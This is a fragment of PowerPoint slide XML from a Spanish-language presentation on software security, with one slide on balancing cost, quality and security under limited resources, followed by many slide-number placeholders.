              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El equilibrio entre costes y la calidad y seguridad del software es un desafío constante en el desarrollo de software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Insuficiencia de recursos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 menudo, los recursos disponibles, como tiempo y presupuesto, son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Esto puede influir en la calidad y seguridad del software si no se gestionan adecuadamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Toma de decisiones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En el desarrollo de software, debemos tomar decisiones sobre cómo asignar los recursos disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Equilibrar costes, calidad y seguridad es una consideración crítica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En resumen, el cumplimiento de requisitos mínimos de seguridad es fundamental en el desarrollo de software, y esto implica analizar los riesgos y tomar decisiones adecuadas. Además, debemos ser conscientes de la constante lucha por equilibrar costes, calidad y seguridad, especialmente cuando los recursos son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA7895C-B67F-BC93-7451-F3E54B87DE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25775434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ED39-E288-CF0B-E07C-F318061340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0E4468-7792-145C-E798-F9000EB026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7CC650-4AE2-D3D0-2D00-7689569DC69A}"/>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3AE5F06-5AF4-C3B6-9FC6-F9333C6BE3A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2307700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CBF46-3620-7802-C3FD-71826564CA6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61D094-100D-69EB-B1B1-EBD77A8FFE7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7A63E3-B185-8A95-702F-3A8CD03D27AE}"/>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76922258-6140-DE3B-3C95-61C5E67FC409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840413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E1D5B-4A8F-AD35-7313-27BEF911CD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17DFC5-1688-CE2A-CC8B-84F995FE010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0E610E6-27AE-0DA2-82EE-0090DA87EBC5}"/>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6670E38D-51E0-0F0B-056A-40835FD7BACA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20094747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C92E5-7EDF-782F-A166-93B1A76836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747E30-814A-3CD9-BEEA-5DF71EECBD5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45CC53-58DF-58FB-8815-503F30357986}"/>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04F0EE7-8A0A-18DE-624D-440008892A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23143678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CE2B-0FAF-C09D-E42E-F0D432F26E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39B69D-B267-B03C-E5C7-783B1F6C3E2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760C02-5C2C-B281-E5DF-3213786A8D0A}"/>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62359FDC-3202-8290-2922-15097E360604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3894685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64E79-0ABC-57DC-886C-91CA335AD85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D11505-1734-53EF-6C57-194E8F5FEBF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BC08E8E-24E8-4F2A-9C08-C549B79FCE1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418A1DB-EB15-2277-EB93-0F162A2436F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22905825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BEFB-5706-7ACB-1590-3BC880AFB4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B7DECD-FDB5-F4A9-94E7-A74661DF69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AFF1D12-BEE1-D2EB-AC44-42B16C22C8DF}"/>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A1ED0205-C3C4-5101-03BA-751753F8ABB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39240367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C9C9B-5A0C-250D-2314-E713672281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92D953A-E36F-8A84-98F2-4738FD0D5DC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388062C-936F-DCD3-E5E8-8B87A246AF7F}"/>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8691DB3-4C26-64C8-43CB-37AE77CE8F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3431649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AF6E3-591F-0FF5-7AB8-538F1F9745A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688FA9-79B4-D8AA-AE54-800CD9193D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D6B58D-201C-5E40-5A3D-E48E4C32DB3F}"/>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C9EA377-FFC5-B580-BEBB-3642DF1A7D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20461163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E26E7-D025-AFEF-E640-7E5E6561452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6B00DB-AE71-CA3F-C0B3-D44871E63B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9B16C5-EF82-F43F-7918-9B559F7FFD04}"/>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4EB9A56-FEB7-A367-B0B4-D577E66DCA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755424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91721-1B6B-0908-534A-599EC244CA6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B175AD-F2D8-3977-9517-88B30E93B8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8C830C2-AE74-77DB-E089-501795E6FA1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81D039A-E8B6-155E-77F1-E4FC32B1D740}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3614461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38AA4-7B6C-8546-959D-8FD559B590B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501718-33E0-1007-DE03-A9052768813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A8D9A7C-8270-C521-B40E-BC0BE33DAB75}"/>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AA380331-6D65-8845-A9F0-9B16676A1C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24394914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AB63-1EB6-54FD-9FDF-60952791434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3E4D8C7-3091-96B3-6E70-71DEA6B7C66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7FAC211-97B7-DFC3-CA52-1037A526953B}"/>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34C5692-577B-DBE1-DE7B-970AC1455E26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8669192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4055F-406C-1D84-AAF9-31D08EE098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63FBF1-E88F-C0D4-E712-8F826D49173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DE75C1-7005-5E38-98D6-8DDD683BD23F}"/>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9EEACE6-3F9B-AA91-BAED-289268704CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42344766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34F29-37F2-CEF5-97A9-1D386FD220D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DE6AA8F-FC07-2C6F-3991-F63F80C9327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F4759B-B5CA-765A-1EF1-9D5C95BF03D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D950BAD3-A5E9-1065-A23E-D10422FA7332}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41690169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9E242-4BCC-4EC7-4448-7AF64FF0338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6E324F9-6CA2-CB4D-BF71-9D745ABAE1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84FEAE-AF52-AAFC-C8C4-C65EE960E8C2}"/>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D92A3459-1879-FECF-0476-F5171E4FF9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3779989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3B523-62DF-77D4-942C-8D82F9FB06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9786C4-5085-2428-2050-68EA25C76AD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893BF30-08F8-521F-4923-BE3702DC7D82}"/>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3B7F8F4-61A3-9BF7-E8A6-15B55E62E2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3483724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631AA-AFFF-0DDD-5D3C-E715898093B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6C7B7A6-9D48-C0E2-C1E1-265AC53F26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FCF89B-6EB4-76FC-91BF-AFFE2B195DD8}"/>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57E7D68-D04C-34BF-A216-4B83E69EC4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2985501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C504F-2E61-8346-19F2-20A17D88F7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9E704E-481A-AC88-33AD-88F72B6C21E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CFB2BB3-4415-20F6-BAB1-8CE91B3814D0}"/>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5E5AB7E-19ED-9D66-DF1E-82D9040745B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8996838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13AA5-CA91-DAF6-9788-E45BE1E7D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DE61A27-27AF-91B3-94B6-9AA51312E9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DA0C1D-EBBD-E375-3765-37741088B235}"/>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EFE78B52-F149-058C-C94F-5811D3DBAD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36796517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82B38-D087-F92E-9412-06588286746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3C4895-CFC0-29E3-1E60-C08CB4872B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16214C-BB81-3915-9EEF-69D9D8219351}"/>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C2AF7FC-27B5-A036-ACB5-60D1758F210A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2042123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9C634-AA86-D4C0-15A3-8D12C06A934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2905D1-E911-39BC-A297-DE904B170A9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5E4369-E7C9-C496-BE5A-F70FC1234CD2}"/>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F66DE82-70A2-6315-B717-29370243D3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36038212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E6E0F-FBD3-5FF9-9CD1-EC21E6A651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19ADAB5-4695-2777-8D5F-E5D359084C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D4D42B1-47B1-DF6A-31AF-17AF4C20DF98}"/>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E668DB9-9031-0A99-94A0-579A98E4A23F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29532600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B0F44-F230-3143-2567-F0EDECD930D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D579BA-5E32-AD47-9633-38B77EB85B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2FFDBA-F91A-B82E-9E5E-7D78D2509C81}"/>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85C0DE8F-1C09-9C98-4C6F-578786030BCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>93</a:t>
            </a:fld>
